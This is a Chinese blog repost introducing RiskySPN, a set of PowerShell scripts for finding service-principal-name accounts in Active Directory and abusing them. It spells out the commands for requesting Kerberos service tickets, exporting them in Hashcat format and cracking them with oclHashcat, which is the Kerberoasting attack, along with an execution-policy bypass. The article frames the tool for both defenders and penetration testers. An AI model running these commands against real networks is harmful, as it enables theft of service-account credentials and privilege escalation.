如何使用RiskySPN检测和利用不安全的服务主体名称SPN

VSole2023-10-18 10:11:18

关于RiskySPN 

RiskySPN是一系列功能强大的PowerShell脚本集合,可以帮助广大研究人员检测和滥用跟SPN(服务主体名称)相关的账户。除此之外,该工具不仅可以帮助蓝队研究人员识别存在安全风险的SPN,还可以帮助红队研究人员利用Kerberos和活动目录来实现权限提升。

 工具要求 

由于该工具中的脚本模块基于PowerShell实现,因此我们需要在能够运行PowerShell脚本的设备上使用该工具。

 工具安装 

广大研究人员可以直接使用下列命令将该项目源码克隆至本地:

git clone https://github.com/cyberark/RiskySPN.git

 工具使用 

安装模块

Import-Module .\RiskySPNs.psm1

或者,直接加载项目中的功能脚本:

. .\Find-PotentiallyCrackableAccounts.ps1

注意:这里需要确保Set-ExecutionPolicy的值设置成了Unrestricted或Bypass。

查看某个函数模块的详细功能信息

Get-Help Get-TGSCipher -Full

注意:所有的功能函数都提供了-Verbose模式。

搜索存在安全漏洞的SPN(服务主体名称)

搜索存在安全漏洞的账户:

Find-PotentiallyCrackableAccounts敏感数据 + RC4 = $$$

生成包含漏洞账户的详细分析报告(CISO < 3):

Export-PotentiallyCrackableAccounts

获取凭证信息

请求Kerberos TGS:

Get-TGSCipher -SPN "MSSQLSvc/prodDB.company.com:1433"
或
Find-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipher

其他使用方法

Find-PotentiallyCrackableAccounts -Sensitive -Stealth -GetSPNs | Get-TGSCipher -Format "Hashcat" | Out-File crack.txt
oclHashcat64.exe -m 13100 crack.txt -a 3

 许可证协议 

本项目的开发与发布遵循GPL-3.0开源许可证协议。

 项目地址 

RiskySPN:https://github.com/cyberark/RiskySPN

信息安全spn
本作品采用《CC 协议》,转载必须注明作者和本文链接
五种分组密码算法
2023-12-11 08:59:36
五种分组密码算法
韩国在数据治理方面开辟了独特的国家治理模式,并推动了相关科技业务模式和监管框架的发展。20多年来,虽然韩国政府在建设国家宽带网络和促进数字技术应用方面做了大量工作,但其仍然面临着三个关键挑战:一是政府、银行、医疗卫生等网络服务需要韩 国打造一个完善的网络认证生态系统;二是跨行业和社会的密集数字化,使韩国易受到网络安全问题的威胁;三是作为世界上最依赖贸易的经济体之一,韩国对商品、资本、人员和技术跨境
数字经济发展速度之快、辐射范围之广、影响程度之深前所未有,正在成为重组全球要素资源、重塑全球经济结构、改变全球竞争格局的关键力量。10月18日,中共中央政治局就推动我国数字经济健康发展进行第三十四次集体学习,习近平总书记强调,要加快新型基础设施建设,加强战略布局,加快建设高速泛在、天地一体、云网融合、智能敏捷、绿色低碳、安全可控的智能化综合性数字信息基础设施,打通经济社会发展的信息“大动脉”。
2023年,我国软件和信息技术服务业(下称“软件业”)运行稳步向好,软件业务收入高速增长,盈利能力保持稳定,软件业务出口小幅回落。
近日,全国信息安全标准化技术委员会秘书处发布了《信息安全技术 网络安全产品互联互通 告警信息格式》《信息安全技术 信息安全风险管理指导》《信息安全技术 信息安全管理体系 要求》《信息安全技术 网络安全产品互联互通 资产信息格式》四项国家标准征求意见稿。
《安全要求》给出了智能手机预装应用程序的基本安全要求,适用于智能手机生产企业的生产活动,也可为相关监管、第三方评估工作提供参考。《安全要求》明确了可卸载范围,指出除系统设置、文件管理、多媒体摄录、接打电话、收发短信、通讯录、浏览器、应用商店等直接支撑操作系统运行或实现智能手机基本功能所必须的基本功能应用程序外,智能手机中其他预装应用程序均应可卸载。
《安全要求》给出了软件供应链安全保护目标,规定了软件供应链组织管理和供应活动管理的安全要求;适用于指导软件供应链中的需方、供方开展组织管理和供应活动管理,可为第三方机构开展软件供应链安全测试和评估提供依据,也可为主管监管部门提供参考。
信息安全成为社会性关注的话题,汽车进入智能网联的发展阶段,汽车俨然成为了新的移动终端,甚至被定义成了生活的第三空间。近年来,关于汽车信息安全的话题和风险的暴露,引发了公众的关注,那究竟什么是汽车信息安全?它对于我们而言意味着什么?我们要怎么样防范?
上周末,信息安全巨头Entrust证实一个月前遭受了勒索软件攻击,攻击者入侵了Entrust的企业网络并从内部系统窃取了数据。
人的因素及实用安全这里人的因素指的是影响人们安全行为和他们采用安全解决方案的社会因素和个人因素。此外,系统必须在维护安全性的同时保持可用性。在缺乏实用安全的情况下,最终就达不到有效的安全。
VSole
网络安全专家